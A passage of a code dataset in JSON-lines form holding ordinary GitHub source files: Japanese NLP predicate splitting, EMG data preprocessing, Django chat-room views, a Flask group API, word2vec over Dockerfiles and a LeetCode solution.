rentai_f) and \"サ変可能\" in doc[end].tag_):\n return {'object': \"\", 'verb': self.compaound(start, end, *doc) + 'する','verb_start': start, 'verb_end': end}\n return {'object': self.compaound(start, end, *doc), 'verb': '', 'verb_start': -1, 'verb_end': -1}\n\n\n \"\"\"\n 複合術部を主述部と補助術部に分割\n \n ret : 主述部 + 補助術部 + 主述始点 + 主述部終点 + 補助述部始点 + 補助述部終点\n \"\"\"\n def verb_devide(self, start, end, *doc):\n s_v_dic = SubVerbDic()\n if start == end:\n return {'verb': self.compaound(start, end, *doc), 'sub_verb': '', 'verb_start': start, 'verb_end': end, 'sub_verb_start': -1, 'sub_verb_end': -1}\n for i in reversed(range(start, end + 1)):\n if i > start and (doc[i - 1].tag_ == '動詞-一般' or doc[i - 1].tag_ == \"名詞-普通名詞-形状詞可能\"):\n continue\n if i + 1 < len(doc) and doc[i + 1].pos_ == \"NOUN\" and not doc[i + 1].norm_ in s_v_dic.sub_verb_dic:\n continue\n if doc[i].norm_ in s_v_dic.sub_verb_dic:\n if doc[i - 1].tag_ != '名詞-普通名詞-サ変可能' and doc[i - 1].pos_ != \"SCONJ\": # 本格始動 など普通名詞との合成\n if doc[end].lemma_ == 'ため' or doc[end].lemma_ == 'もの' or doc[end].lemma_ == 'とき' or doc[end].lemma_ == '際' or doc[end].lemma_ == 'こと' or doc[end].lemma_ == '場合' or doc[end].lemma_ == '人' or doc[end].lemma_ == 'とき':\n return {'verb': '', 'sub_verb': self.compaound(i, end, *doc) + 'だ', 'verb_start': -1, 'verb_end': -1, 'sub_verb_start': i, 'sub_verb_end': end}\n elif doc[end].tag_ == '名詞-普通名詞-サ変可能':\n # 京都にモデルハウス披露 → 京都に モデルハウスを 披露する\n# if doc[i - 1].tag_ == '名詞-普通名詞-一般' or (doc[i - 1].tag_ == '形状詞-一般' and doc[i - 1].head.i == i):\n# return {'verb': self.compaound(start, end, *doc), 'sub_verb': '', 'verb_start': start, 'verb_end': end, 'sub_verb_start': -1, 'sub_verb_end': -1}\n# return {'verb': '', 'sub_verb': self.compaound(i, end, *doc) + 'する', 'verb_start': -1, 'verb_end': -1, 'sub_verb_start': i, 'sub_verb_end': end}\n if doc[i - 1].lemma_ == \"初\":\n return {'verb': '', 'sub_verb': self.compaound(i - 1, end, *doc) + 'する', 'verb_start': -1,\n 'verb_end': -1, 'sub_verb_start': i, 'sub_verb_end': end,\n \"object\": self.compaound(start, i - 2, *doc), \"obj_start\": start, \"obj_end\": i - 2}\n else:\n return {'verb': '', 'sub_verb': self.compaound(i, end, *doc) + 'する', 'verb_start': -1,\n 'verb_end': -1, 'sub_verb_start': i, 'sub_verb_end': end,\n \"object\":self.compaound(start, i - 1, *doc), \"obj_start\": start, \"obj_end\": i - 1}\n elif doc[end].lemma_ == 'だ' or doc[end].lemma_ == 'です':\n return {'verb': '', 'sub_verb': self.compaound(i, end, *doc) , 'verb_start': -1,'verb_end': -1, 'sub_verb_start': i, 'sub_verb_end': end}\n elif doc[end].norm_ == '出来る':\n if doc[end - 1].pos_ == 'ADP':\n return {'verb': self.compaound(start, i - 2, *doc) + 'する', 'sub_verb': 'できる', 'verb_start': start, 'verb_end': i - 2, 'sub_verb_start': end, 'sub_verb_end': end}\n else:\n return {'verb': self.compaound(start, i - 1, *doc) + 'する', 'sub_verb': 'できる', 'verb_start': start, 'verb_end': i - 1, 'sub_verb_start': end, 'sub_verb_end': end}\n elif doc[end - 3].norm_ == '出来る' and doc[end - 2].orth_ == 'よう' and doc[end - 1].orth_ == 'に' and doc[end].norm_ == '成る':\n if doc[end - 4].pos_ == 'ADP':\n return {'verb': self.compaound(start, end - 5, *doc) + 'する', 'sub_verb': 'できるようになる', 'verb_start': start, 'verb_end': end - 5, 'sub_verb_start': end - 4, 'sub_verb_end': end}\n else:\n return {'verb': self.compaound(start, end - 4, *doc) + 'する', 'sub_verb': 'できるようになる', 'verb_start': start, 'verb_end': end - 4, 'sub_verb_start': end - 4, 'sub_verb_end': end}\n elif doc[end - 3].norm_ == '出来る' and doc[end - 2].orth_ == 'よう' and doc[end - 1].orth_ == 'に' and doc[end].norm_ == '為る':\n if doc[end - 4].pos_ == 'ADP':\n return {'verb': self.compaound(start, end - 5, *doc) + 'する', 'sub_verb': 'できるようにする', 'verb_start': start, 'verb_end': end - 5, 'sub_verb_start': end - 4, 'sub_verb_end': end}\n else:\n return {'verb': self.compaound(start, end - 4, *doc) + 'する', 'sub_verb': 'できるようにする', 'verb_start': start, 'verb_end': end - 4, 'sub_verb_start': end - 4, 'sub_verb_end': end}\n elif doc[end].norm_ == '成る':\n return {'verb': '', 'sub_verb': self.compaound(i, end, *doc), 'verb_start': -1, 'verb_end': -1, 'sub_verb_start': i, 'sub_verb_end': end}\n elif doc[end].norm_ == '為る':\n if doc[i - 1].tag_ == '名詞-普通名詞-一般' or doc[i - 1].tag_ == '名詞-普通名詞-サ変可能' or (doc[i - 1].tag_ == '形状詞-一般' and doc[i - 1].head.i == i):\n return {'verb': self.compaound(start, end, *doc), 'sub_verb': '', 'verb_start': start, 'verb_end': end, 'sub_verb_start': -1, 'sub_verb_end': -1}\n return {'verb': '', 'sub_verb': self.compaound(i, end, *doc), 'verb_start': -1, 'verb_end': -1, 'sub_verb_start': i, 'sub_verb_end': end}\n else:\n return {'verb': '', 'sub_verb': self.compaound(i, end, *doc) + 'する', 'verb_start': -1, 'verb_end': -1, 'sub_verb_start': i, 'sub_verb_end': end}\n\n if doc[end - 1].pos_ == \"SCONJ\":\n return {'verb': self.compaound(start, i - 2, *doc), 'sub_verb': self.compaound(i, end, *doc), 'verb_start': start, 'verb_end': i - 1, 'sub_verb_start': i, 'sub_verb_end': end}\n elif doc[end].tag_ == '名詞-普通名詞-サ変可���':\n return {'verb': self.compaound(start, i - 1, *doc) + 'する', 'sub_verb': self.compaound(i, end, *doc) + 'する', 'verb_start': start, 'verb_end': i - 1, 'sub_verb_start': i, 'sub_verb_end': end}\n else:\n return {'verb': self.compaound(start, i - 1, *doc) + 'する', 'sub_verb': self.compaound(i, end, *doc), 'verb_start': start, 'verb_end': i - 1, 'sub_verb_start': i, 'sub_verb_end': end}\n else:\n if doc[i].pos_ == \"VERB\":\n break\n return {'verb': self.compaound(start, end, *doc), 'sub_verb': '', 'verb_start': start, 'verb_end': end, 'sub_verb_start': -1, 'sub_verb_end': -1}\n","repo_name":"koba-stockmark/PredicateStructuring","sub_path":"predicate_split.py","file_name":"predicate_split.py","file_ext":"py","file_size_in_byte":17144,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"36972332069","text":"import numpy as np\r\nfrom scipy.sparse import data\r\nfrom tables.atom import EnumAtom\r\nimport ninapro_utils \r\nfrom pathlib import Path \r\nfrom zipfile import ZipFile\r\nimport matplotlib.pyplot as plt \r\nimport collections\r\nimport deepdish as dd \r\nfrom tqdm import tqdm\r\nfrom utils import *\r\n\r\nimport os\r\nimport yaml\r\nimport random \r\nimport sys\r\n\r\n# Read the configuration file for importing model configurations\r\nconfig_path = Path(__file__).parents[1] / 'config.yml'\r\nconfig = yaml.load(open(config_path, 'r'), Loader=yaml.SafeLoader)\r\n\r\ndb2_path = Path(__file__).parents[1] / 'data/raw/DB2_zip/'\r\ndb2_extract_dir = Path(__file__).parents[1] / 'data/raw/DB2/'\r\ndb2_savepath = Path(__file__).parents[1] / 'data/interm/DB2.h5'\r\n\r\nos.makedirs(db2_extract_dir, exist_ok=True)\r\nos.makedirs(Path(__file__).parents[1] / 'data/interm/', exist_ok=True)\r\n \r\n###############################################################\r\n# Extract invidual zip files of subjects second dataset of DB2\r\n###############################################################\r\nwith skip_run('skip', 'Extract the second dataset from Ninapro DB2') as check, check():\r\n for file in tqdm(os.listdir(db2_path)):\r\n # extract if the file is a zip file\r\n if (file.split(\".\")[1] == 'zip') and (file.split(\"_\")[0] == 'DB2'):\r\n filepath = os.path.join(db2_path, file)\r\n with ZipFile(filepath, 'r') as zip_ref:\r\n zip_ref.extractall(db2_extract_dir)\r\n\r\n##################################################################################################\r\n# Run the following chunk of code if the exercise 1 (17 classes) should be saved into hdf5 file \r\n##################################################################################################\r\nwith skip_run('skip', 'Import DB2 dataset and save it into HDF5 format') as check, check():\r\n data_dict = collections.defaultdict()\r\n for subject in tqdm(np.arange(1, config['num_subjects']+1)):\r\n # Get EMG, repetition and movement data, cap max length of rest data before and after each movement to 5 seconds\r\n # Capping occurs by reducing the size of repetition segments since splitting is based on repetition number\r\n sub_dict = ninapro_utils.import_db2(db2_extract_dir, subject, rest_length_cap=5)\r\n\r\n data_dict['S'+str(subject)] = sub_dict\r\n \r\n dd.io.save(db2_savepath, data_dict)\r\n\r\n##################################################################\r\n# Run the following code to split the raw dataset and normalize it \r\n##################################################################\r\nbatch_data_path = Path(__file__).parents[1] / 'data/interm/DB2_batch.h5'\r\nwith skip_run('skip', 'Create EMG samples of constant length windows (wind_size x channels)') as check, check(): \r\n window_len = int(np.round(config['window_size'] * config['fs']))\r\n n_channels = config['n_channels']\r\n overlap_perct = config['window_overlap']\r\n \r\n data = dd.io.load(db2_savepath)\r\n batch_data = collections.defaultdict()\r\n\r\n for subject in tqdm(np.arange(1, config['num_subjects']+1)):\r\n rep_regions = data['S'+str(subject)]['rep_regions']\r\n emg = data['S'+str(subject)]['emg']\r\n \r\n # apply mu-law transformation and then normalize the data\r\n emg = ninapro_utils.mu_law_transformation(emg)\r\n emg = ninapro_utils.minmax_normalization(emg)\r\n \r\n emg_splits = []\r\n for i in range(0, len(rep_regions), 2):\r\n rep_len = rep_regions[i+1] - rep_regions[i]\r\n assert window_len < rep_len, \"The repetition data is too short\"\r\n \r\n num_segs = int((np.floor(rep_len / window_len) - 1) / (1 - overlap_perct))\r\n step_size = int((1 - overlap_perct) * window_len)\r\n last_ind = int(rep_regions[i] + window_len * ( 1 + (1 - overlap_perct) *num_segs))\r\n\r\n emg_temp = emg[rep_regions[i]:last_ind, :]\r\n \r\n # split each repetition of emg into small windows of constant window_len\r\n for j in range(0, emg_temp.shape[0] - window_len + 1, step_size):\r\n emg_splits.append(np.expand_dims(emg_temp[j:j+window_len, :], axis=0))\r\n \r\n emg_splits = np.concatenate(emg_splits, axis=0)\r\n \r\n batch_data['S'+str(subject)] = emg_splits\r\n \r\n dd.io.save(batch_data_path, batch_data)\r\n \r\n##################################################################\r\n# Split train and test data\r\n##################################################################\r\nwith skip_run('skip', 'Creating batches of dataset using random subjects and samples for training the encoder') as check, check():\r\n data = dd.io.load(batch_data_path)\r\n \r\n # shuffled subject list \r\n subjects = [15, 7, 32, 9, 8, 18, 37, 31, 3, 35, 19, 36, 33, 6, 11, 29, 1, 34, 21, 17, 24, 25, 27, 13,\r\n 23, 12, 20, 16, 30, 10, 5, 28, 2, 26, 40, 4, 22, 38, 39, 14]\r\n \r\n # shuffle the samples of each subject \r\n for sub in subjects:\r\n data['S'+str(sub)] = ninapro_utils.shuffle_emg_samples(data['S'+str(sub)])\r\n \r\n n = config['batch_param']['n'] # number of subjects required in each batch\r\n m = config['batch_param']['m'] # number of samples per subject in each batch\r\n\r\n train_feats, train_labels = [], []\r\n test_feats, test_labels = [], []\r\n valid_feats, valid_labels = [], [] # samples removed from the training set (These can be used for validation)\r\n\r\n train_subjects = subjects[:-2]\r\n test_subjects = subjects[-2:]\r\n\r\n while len(train_subjects) > n:\r\n batch_subjects = random.sample(train_subjects, k=n)\r\n batch_samples, batch_labels = [], []\r\n for subject in batch_subjects:\r\n emg = data['S'+str(subject)]\r\n \r\n batch_samples.append(emg[:m, :, :])\r\n batch_labels.append(subject * np.ones(m, dtype=np.int8))\r\n \r\n # delete the already retrieved samples from the subject dictionary\r\n emg = np.delete(emg, np.arange(m), axis=0)\r\n data['S'+str(subject)] = emg \r\n \r\n batch_samples = np.concatenate(batch_samples, axis=0)\r\n batch_labels = np.concatenate(batch_labels, axis=0)\r\n \r\n train_feats.append(batch_samples)\r\n train_labels.append(batch_labels)\r\n \r\n delete_subjects, valid_feats, valid_labels = ninapro_utils.prune_subject_list(train_subjects, data, n, m, valid_feats, valid_labels)\r\n \r\n # update the subject list\r\n train_subjects = list(set(train_subjects) - set(delete_subjects))\r\n \r\n # subjects to be removed due to shortage of samples\r\n for sub in delete_subjects:\r\n del data['S'+str(sub)]\r\n \r\n train_feats = np.concatenate(train_feats, axis=0)\r\n train_labels = np.concatenate(train_labels, axis=0)\r\n \r\n for sub in data.keys():\r\n valid_feats.append(data[sub])\r\n \r\n labels = int(sub.split('S')[1]) * np.ones(data[sub].shape[0], dtype=np.int8)\r\n valid_labels.append(labels)\r\n \r\n valid_feats = np.concatenate(valid_feats, axis=0)\r\n valid_labels = np.concatenate(valid_labels, axis=0)\r\n \r\n # prepare the test dataset \r\n for subject in subjects[-2:]:\r\n emg = data['S'+str(subject)]\r\n labels = subject * np.ones(emg.shape[0], dtype=np.int8)\r\n\r\n test_feats.append(emg)\r\n test_labels.append(labels)\r\n\r\n test_feats = np.concatenate(test_feats, axis=0)\r\n test_labels = np.concatenate(test_labels, axis=0)\r\n \r\n traindata_savepath = Path(__file__).parents[1] / 'data/processed/Train.h5'\r\n testdata_savepath = Path(__file__).parents[1] / 'data/processed/Test.h5'\r\n validdata_savepath = Path(__file__).parents[1] / 'data/processed/Validation.h5'\r\n \r\n # save the training data in terms of the created batches\r\n # train_data = collections.defaultdict()\r\n # for i, val in enumerate(train_feats):\r\n # train_data['batch_'+str(i)] = {'features': train_feats[i],\r\n # 'labels': train_labels[i]}\r\n \r\n dd.io.save(traindata_savepath, {'features': train_feats,\r\n 'labels': train_labels})\r\n \r\n dd.io.save(testdata_savepath, {'features': test_feats,\r\n 'labels': test_labels})\r\n \r\n dd.io.save(validdata_savepath, {'features': valid_feats,\r\n 'labels': valid_labels})\r\n \r\n\r\n\r\nplt.show()\r\n\r\n","repo_name":"srisadhan/EMG_style_content","sub_path":"src/load_dataset.py","file_name":"load_dataset.py","file_ext":"py","file_size_in_byte":8564,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"5879525753","text":"from sqlalchemy import Column, String, Integer, ForeignKey\nfrom sqlalchemy.orm import relationship\nfrom sqlalchemy.sql.sqltypes import Float\nfrom .entity import Entity, Base\n\n\nclass Item(Entity, Base): \n __tablename__ = 'items'\n\n name = Column(String)\n artist = Column(String)\n purchased_price = Column(Float)\n model_number = Column(String)\n manufacturer = Column(String)\n sku = Column(String)\n description = Column(String)\n category_id = Column(Integer, ForeignKey('categories.id'))\n category = relationship(\"Category\")\n city_id = Column(Integer, ForeignKey('cities.id'))\n city = relationship(\"City\")\n state_id = Column(Integer, ForeignKey('states.id'))\n state = relationship(\"State\")\n\n def __init__(self, name, artist, purchased_price, model_number, manufacturer, category_id, city_id, state_id, sku, description, created_by):\n Entity.__init__(self, created_by)\n self.name = name\n self.artist = artist\n self.purchased_price = purchased_price\n self.manufacturer = manufacturer\n self.model_number = model_number\n self.sku = sku\n self.description = description\n self.category_id = category_id\n self.city_id = city_id\n self.state_id = state_id\n","repo_name":"imlocle/my-collection","sub_path":"my-collection-api/src/model/item.py","file_name":"item.py","file_ext":"py","file_size_in_byte":1264,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"35622863976","text":"import csv\nfrom django.core.management import BaseCommand\n\n# Import the model \nfrom coffee.models import ratings\n\n\nclass Command(BaseCommand):\n # Show this when the user types help\n help = \"Loads data from ratings\"\n\n def handle(self, *args, **options):\n \n # Show this before loading the data into the database\n print(\"updating\")\n\n #Code to load the data into database\n for row in csv.reader(open('C:/Users/jacoma/OneDrive - Microsoft/Desktop/data/coffee_ratings.csv')):\n rate=ratings.objects.get(rating_id=row[0])\n rate.rating_date = row[7]\n rate.save(update_fields=['rating_date'])\n print(row[0])","repo_name":"onthemarq/coffee_app","sub_path":"coffee/management/commands/update_ratings.py","file_name":"update_ratings.py","file_ext":"py","file_size_in_byte":688,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"2355146997","text":"from django import forms\r\nfrom django.http.response import HttpResponseRedirect\r\nfrom django.shortcuts import render, redirect\r\nfrom .models import Message, Room, Topic , User\r\nfrom .forms import MessageForm, MyUserCreationForm, RoomForm, UserForm, UserCreationForm\r\nfrom django.db.models import Q\r\nfrom django.contrib.auth.decorators import login_required\r\nfrom django.contrib import messages\r\nfrom django.contrib.auth import authenticate, login, logout\r\n\r\n# login function\r\n\r\n\r\ndef loginPage(request):\r\n page = \"login\"\r\n if request.user.is_authenticated:\r\n return redirect(\"home\")\r\n if request.method == \"POST\":\r\n email = request.POST.get(\"email\")\r\n password = request.POST.get(\"password\")\r\n user = authenticate(request, email=email, password=password)\r\n if user is not None:\r\n userconfirm = User.objects.get(email=email)\r\n login(request, userconfirm)\r\n print(userconfirm.email)\r\n return redirect(\"home\")\r\n else:\r\n messages.error(request, \"Wrong Username or Password\")\r\n context = {\"page\": page}\r\n return render(request, \"chat/login_register.html\", context)\r\n\r\n\r\n# Register\r\n\r\n\r\ndef RegisterPage(request):\r\n form = MyUserCreationForm()\r\n if request.method == \"POST\":\r\n form = MyUserCreationForm(request.POST)\r\n if form.is_valid():\r\n user = form.save(commit=False)\r\n user.username = user.username.lower()\r\n user.save()\r\n login(request, user)\r\n return redirect(\"home\")\r\n else:\r\n messages.error(request, \"An error occured during registration\")\r\n return render(request, \"chat/login_register.html\", {\"form\": form})\r\n\r\n\r\n# Logout function\r\ndef LogoutUser(request):\r\n logout(request)\r\n return redirect(\"home\")\r\n\r\n\r\n# View room\r\n\r\n\r\ndef home(request):\r\n q = request.GET.get(\"q\") if request.GET.get(\"q\") != None else \"\"\r\n rooms = Room.objects.filter(\r\n Q(topic__name__icontains=q)\r\n | Q(name__icontains=q)\r\n | Q(host__username__icontains=q)\r\n )\r\n\r\n topics = Topic.objects.all()\r\n room_count = rooms.count()\r\n room_message = Message.objects.filter(Q(room__topic__name__icontains=q))\r\n context = {\r\n \"rooms\": rooms,\r\n \"topics\": topics,\r\n \"room_count\": room_count,\r\n \"room_message\": room_message,\r\n }\r\n return render(request, \"chat/index.html\", context)\r\n\r\n\r\n# @login_required(login_url='/login')\r\ndef ProfilePage(request, pk):\r\n users = User.objects.get(id=pk)\r\n rooms = users.room_set.all()\r\n topics = Topic.objects.all()\r\n room_message = users.message_set.all()\r\n msgz = \"\"\r\n msg2 = \"\"\r\n for room_msgs in room_message:\r\n msgz = room_msgs.user.username\r\n for room in rooms:\r\n msg2 = room.host.username\r\n context = {\r\n \"users\": users,\r\n \"rooms\": rooms,\r\n \"room_message\": room_message,\r\n \"msgz\": msgz,\r\n \"msg2\": msg2,\r\n \"topics\": topics,\r\n }\r\n return render(request, \"chat/profile.html\", context)\r\n\r\n\r\n# room with ID function\r\n\r\n\r\ndef room(request, pk):\r\n room = Room.objects.get(id=pk)\r\n referrer = request.META[\"HTTP_REFERER\"]\r\n room_messages = (\r\n room.message_set.all()\r\n ) # _set.all() is used for One-to-many relationship\r\n participants = (\r\n room.participants.all()\r\n ) # .all() is used for Many-To-Many relationship\r\n if request.method == \"POST\":\r\n message = Message.objects.create(\r\n user=request.user, room=room, body=request.POST.get(\"body\")\r\n )\r\n room.participants.add(request.user)\r\n return redirect(\"room\", pk=room.id)\r\n context = {\r\n \"room\": room,\r\n \"room_messages\": room_messages,\r\n \"participants\": participants,\r\n }\r\n return render(request, \"chat/room.html\", context)\r\n\r\n\r\n# Create room route here\r\n\r\n\r\n@login_required(login_url=\"/login\")\r\ndef CreateRoom(request):\r\n form = RoomForm()\r\n topics = Topic.objects.all()\r\n if request.method == \"POST\":\r\n topic_name = request.POST.get(\"topic\")\r\n topic, created = Topic.objects.get_or_create(name=topic_name)\r\n form = RoomForm(request.POST)\r\n Room.objects.create(\r\n host=request.user,\r\n topic=topic,\r\n name=request.POST.get(\"name\"),\r\n description=request.POST.get(\"description\"),\r\n )\r\n # if form.is_valid():\r\n # room= form.save(commit=False)\r\n # room.host=request.user\r\n # room.save()\r\n return redirect(\"home\")\r\n context = {\"form\": form, \"topics\": topics}\r\n return render(request, \"chat/room_form.html\", context)\r\n\r\n\r\n# Update room here\r\n@login_required(login_url=\"/login\")\r\ndef UpdateRoom(request, pk):\r\n room = Room.objects.get(id=pk)\r\n form = RoomForm(instance=room)\r\n topics = Topic.objects.all()\r\n page_update = \"update\"\r\n if request.user == room.host or request.user.is_superuser == True:\r\n if request.method == \"POST\":\r\n topic_name = request.POST.get(\"topic\")\r\n topic, created = Topic.objects.get_or_create(name=topic_name)\r\n room.name = request.POST.get(\"name\")\r\n room.topic = topic\r\n room.description = request.POST.get(\"description\")\r\n room.save()\r\n return redirect(\"home\")\r\n context = {\r\n \"form\": form,\r\n \"topics\": topics,\r\n \"room\": room,\r\n \"page_update\": page_update,\r\n }\r\n return render(request, \"chat/room_form.html\", context)\r\n referrer = request.META[\"HTTP_REFERER\"]\r\n messages.error(request, \"Sorry, You are not permited to updated this room\")\r\n print(referrer)\r\n return HttpResponseRedirect(referrer)\r\n\r\n # if request.user != room.host:\r\n # referrer = request.META['HTTP_REFERER']\r\n # messages.error(request, 'Sorry, You are not permited to updated this room')\r\n # print(referrer)\r\n # return HttpResponseRedirect(referrer)\r\n # if request.method == 'POST':\r\n # form = RoomForm(request.POST, instance=room)\r\n # if form.is_valid():\r\n # form.save()\r\n # return redirect('home')\r\n # context ={'form':form}\r\n # return render(request, 'chat/room_form.html', context)\r\n\r\n\r\n# Delete view\r\n@login_required(login_url=\"/login\")\r\ndef DeleteRoom(request, pk):\r\n room = Room.objects.get(id=pk)\r\n if request.user == room.host or request.user.is_superuser == True:\r\n if request.method == \"POST\":\r\n room.delete()\r\n return redirect(\"home\")\r\n return render(request, \"chat/delete.html\", {\"obj\": room})\r\n referrer = request.META[\"HTTP_REFERER\"]\r\n messages.error(request, \"Sorry, You are not permited to delete this room\")\r\n print(referrer)\r\n return HttpResponseRedirect(referrer)\r\n\r\n # if request.user != room.host:\r\n # referrer = request.META['HTTP_REFERER']\r\n # messages.error(request, 'Sorry, You are not permited to delete this room')\r\n # print(referrer)\r\n # return HttpResponseRedirect(referrer)\r\n # if request.user.is_superuser == True:\r\n # if request.method == 'POST':\r\n # room.delete()\r\n # return redirect ('home')\r\n # return render (request, 'chat/delete.html', {'obj': room})\r\n\r\n\r\n# Delete message\r\n@login_required(login_url=\"/login\")\r\ndef DeleteMessage(request, pk):\r\n room_message = Message.objects.get(id=pk)\r\n if request.method == \"POST\":\r\n if request.user == room_message.user or request.user.is_superuser == True:\r\n print(request.user)\r\n room_message.delete()\r\n messages.success(request, \"Message deleted successfully\")\r\n print(request.user.is_superuser)\r\n return redirect(\"home\")\r\n else:\r\n referrer = request.META[\"HTTP_REFERER\"]\r\n messages.error(\r\n request, \"Sorry, You are not permited to delete this message\"\r\n )\r\n print(referrer)\r\n return HttpResponseRedirect(referrer)\r\n return render(request, \"chat/delete.html\", {\"obj\": room_message})\r\n\r\n\r\n# Update room message here\r\n@login_required(login_url=\"/login\")\r\ndef UpdateMessage(request, pk):\r\n msg_update = Message.objects.get(id=pk)\r\n form = MessageForm(instance=msg_update)\r\n if request.user != msg_update.user:\r\n referrer = request.META[\"HTTP_REFERER\"]\r\n messages.error(request, \"Sorry, You are not permited to updated this message\")\r\n print(referrer)\r\n return HttpResponseRedirect(referrer)\r\n if request.method == \"POST\":\r\n form = MessageForm(request.POST, instance=msg_update)\r\n if form.is_valid():\r\n form.save()\r\n return redirect(\"home\")\r\n context = {\"form\": form}\r\n return render(request, \"chat/room_form.html\", context)\r\n\r\n\r\n@login_required(login_url=\"/login\")\r\ndef UpdateUser(request):\r\n user = request.user\r\n form = UserForm(instance=user)\r\n if request.method == \"POST\":\r\n form = UserForm(request.POST, request.FILES,instance=user)\r\n if form.is_valid():\r\n form.save()\r\n return redirect(\"profile-page\", pk=user.id)\r\n return render(request, \"chat/update-user.html\", {\"form\": form})\r\n\r\n\r\ndef TopicsPage(request):\r\n q = request.GET.get(\"q\") if request.GET.get(\"q\") != None else \"\"\r\n topics = Topic.objects.filter(name__icontains=q)\r\n return render(request, \"chat/topics.html\", {\"topics\": topics})\r\n\r\n\r\ndef ActivityPage(request):\r\n room_messages = Message.objects.all()\r\n return render(request, \"chat/activity.html\", {\"room_messages\": room_messages})\r\n\r\n\r\n# rooms = [\r\n# {'id':1, 'name': 'Lets learn python'},\r\n# {'id':2, 'name': 'Lets learn Java'},\r\n# { 'id':3, 'name': 'Lets learn C#'},\r\n# {'id':4, 'name': 'Design with me'},\r\n# ]\r\n\r\n\r\n# def home(request):\r\n# context ={'rooms':rooms}\r\n# return render (request, 'chat/index.html',context)\r\n\r\n# def room(request, pk):\r\n# room = None\r\n# for i in rooms:\r\n# if i['id'] == int(pk):\r\n# room =i\r\n# context = {'room': room}\r\n\r\n# return render (request, 'chat/room.html', context)\r\n","repo_name":"Blazskills/django-chatroom","sub_path":"base/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":10217,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"70811867306","text":"import glob\nimport os\nimport pprint\n\nimport pyfpgrowth\nimport pprint\n\nfrom collections import Counter\nimport itertools\n\nfrom prefixspan import PrefixSpan\n\nfrom src.lib.dockerfiles import Dockerfile, Model\nfrom src.lib.nlps import NLP\nfrom src.lib.words import Token\nfrom src.lib.cluster import Dived\nfrom src.lib.blocks import Hash\n\nfrom gensim.models import word2vec\n\nimport datetime\n\ndef execute(key):\n try:\n model = word2vec.Word2Vec.load(\"./Delivers/result.model\")\n result = model.wv.similarity(\"dcdc06206343aa7476046a5897e11abc9276f1766fb6cdcd900119830b32cf2b\", key)\n # result = model.wv.most_similar(\"dcdc06206343aa7476046a5897e11abc9276f1766fb6cdcd900119830b32cf2b\", topn=10)\n # print(\"rm\", data[key], result)\n except Exception as e:\n return 0\n else:\n return result\n\ndef sub(key):\n return data[key]\n\nPYTHON_PROJECT = \"./python/**\"\ndef main():\n combinations = {}\n file_paths = [comp for comp in glob.glob(PYTHON_PROJECT, recursive=True) if os.path.isfile(comp) if comp.endswith(\"Dockerfile\")]\n global data\n data = {}\n hh = []\n for file_path in file_paths:\n model = Model(file_path)\n shells = model.shells\n\n for shell in shells:\n hash_words = Hash.execute(shell)\n if not [cnt for cnt in hash_words] in hh:\n hh.append([cnt for cnt in hash_words])\n for key, value in hash_words.items():\n if not key in data:\n data[key] = value\n \n results = {}\n\n for key, value in data.items():\n if value == \"-rf\":\n nh0 = [h for h in hh if key in h][0]\n command0 = [sub(n) for n in nh0]\n print(command0)\n try:\n nh1 = [h for h in hh if key in h][1]\n except:\n pass\n else:\n command1 = [sub(n) for n in nh1]\n print(command1)\n print(execute(key), value)\n \n\n \n\n\n \n # results[value] = execute(key) \n\n\n \n\n\n\n\n\n\nif __name__ == \"__main__\":\n main()","repo_name":"aoimaru/pydock","sub_path":"read.py","file_name":"read.py","file_ext":"py","file_size_in_byte":2094,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"30500937040","text":"from flask import jsonify, abort, request, Blueprint\nfrom pprint import pprint\nimport logging\nfrom utils.utils import hash_password, check_password\nfrom flask_jwt_extended import jwt_required, get_jwt_identity\n\nfrom data import db_session\nfrom data.models.Users import User\nfrom data.models.Groups import Group\n\nblueprint = Blueprint('groups_api', __name__)\n\n\n@blueprint.route('/api/group/', methods=['POST'])\n@jwt_required()\ndef register_group(group_name):\n Group.if_group_already_created(group_name)\n sess = db_session.create_session()\n req = request.get_json(force=True)\n user_id = get_jwt_identity()\n group = Group(\n name=group_name,\n members=[user_id], # must be iterable\n admin=user_id\n )\n sess.add(group)\n sess.commit()\n created_group_id = sess.query(Group.id).filter(Group.name == group_name).first()[0]\n return jsonify({'success': 'OK', \"group_id\": created_group_id}), 200\n\n\n@blueprint.route('/api/group/', methods=['PATCH'])\n@jwt_required()\ndef update_group_name(group_name):\n user_id = int(get_jwt_identity())\n Group.if_group_not_found_by_name(group_name)\n Group.if_user_is_not_admin(group_name, user_id)\n req = request.get_json(force=True)\n sess = db_session.create_session()\n group = sess.query(Group).filter(Group.admin == user_id, Group.name == group_name).update({Group.name: req['new_group_name']}, synchronize_session=False)\n sess.commit()\n return jsonify({'success': 'OK'}), 200\n\n","repo_name":"melnk300/heroku","sub_path":"api/groups_api.py","file_name":"groups_api.py","file_ext":"py","file_size_in_byte":1499,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"38727239551","text":"'''\n###### * User Profile : Keval_78 \nLinkedIn: https://www.linkedin.com/in/kevalpadsala78/\nGithub: https://github.com/Keval78\nLeetcode: https://leetcode.com/Keval_78/\n'''\n\nfrom typing import List\n\nclass Solution:\n def findPeaks(self, mountain: List[int]) -> List[int]:\n n = len(mountain)\n indices = []\n for i in range(1, n-1):\n if mountain[i-1] < mountain[i] < mountain[i+1]:\n indices.append(i)\n \n return indices\n \n\n\n\nmountain = [2,4,4]\nans = Solution().findPeaks(mountain)\nprint(ans)\n\n\nmountain = [1,4,3,8,5]\nans = Solution().findPeaks(mountain)\nprint(ans)\n\n\n","repo_name":"Keval78/Programming_Solutions","sub_path":"LeetCode/Daily/2951 Find the Peaks.py","file_name":"2951 Find the Peaks.py","file_ext":"py","file_size_in_byte":632,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"30494349233","text":"##Little helper for Netbeans to handle toml files\n\nimport sys\nfrom pathlib import Path\n\nimport tomlkit\n\ninput_path = sys.argv[1]\nproject_name 